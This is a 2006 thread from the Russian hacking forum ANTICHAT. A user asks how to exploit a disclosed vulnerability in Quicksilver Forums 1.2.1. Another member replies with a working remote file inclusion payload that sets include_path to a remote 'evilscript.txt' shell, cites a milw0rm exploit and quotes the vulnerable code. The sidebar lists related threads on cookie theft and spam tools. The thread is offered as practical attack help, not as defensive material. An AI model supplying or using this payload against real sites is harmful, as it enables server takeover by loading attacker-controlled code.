HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу Quicksilver Forums 1.2.1
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Quicksilver Forums 1.2.1
  #1  
Старый 17.12.2006, 01:03
CaH9
Познающий
Регистрация: 16.04.2006
Сообщений: 34
С нами: 10562123

Репутация: 41
По умолчанию Quicksilver Forums 1.2.1
http://www.securitylab.ru/vulnerability/273870.php
люди помогите разобраться с уязвимостью , как ее использовать ?
P.S в поиске пусто
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 17.12.2006, 02:14
kyzmi4
Участник форума
Регистрация: 19.07.2004
Сообщений: 135
С нами: 11478626

Репутация: 112
По умолчанию
О.o очень просто. Береш уязвимый форум и подставляеш в адресной строке:
lib/activeutil.php?set[include_path]="сайт с шеллом например rst"

Пример:
например есть сайт с форумом http://localhost
Там есть форум http://localhost/forum/
Пишем: http://localhost/forum/lib/activeutil.php?set[include_path]=http://site.com/evilscript.txt?
 
Ответить с цитированием

  #3  
Старый 17.12.2006, 13:41
CaH9
Познающий
Регистрация: 16.04.2006
Сообщений: 34
С нами: 10562123

Репутация: 41
По умолчанию
а что означает [include_path] ???
 
Ответить с цитированием

  #4  
Старый 17.12.2006, 15:44
kyzmi4
Участник форума
Регистрация: 19.07.2004
Сообщений: 135
С нами: 11478626

Репутация: 112
По умолчанию
http://www.milw0rm.com/exploits/2356

require_once $set['include_path'] . '/lib/bbcode.php';

Кароче [include_path] так и оставляй =)
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
posting cookie steal code to forums? !!RapBoy!! Forum for discussion of ANTICHAT 11 10.06.2006 14:26
Огромный выбор софта для Sms, Mail, Forums, Gests спама 549iK Разное - Покупка, продажа, обмен 0 19.10.2005 00:52
Вопрос про уязвимости в форуме snitz forums 2000 Уязвимости CMS / форумов 4 09.11.2004 10:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.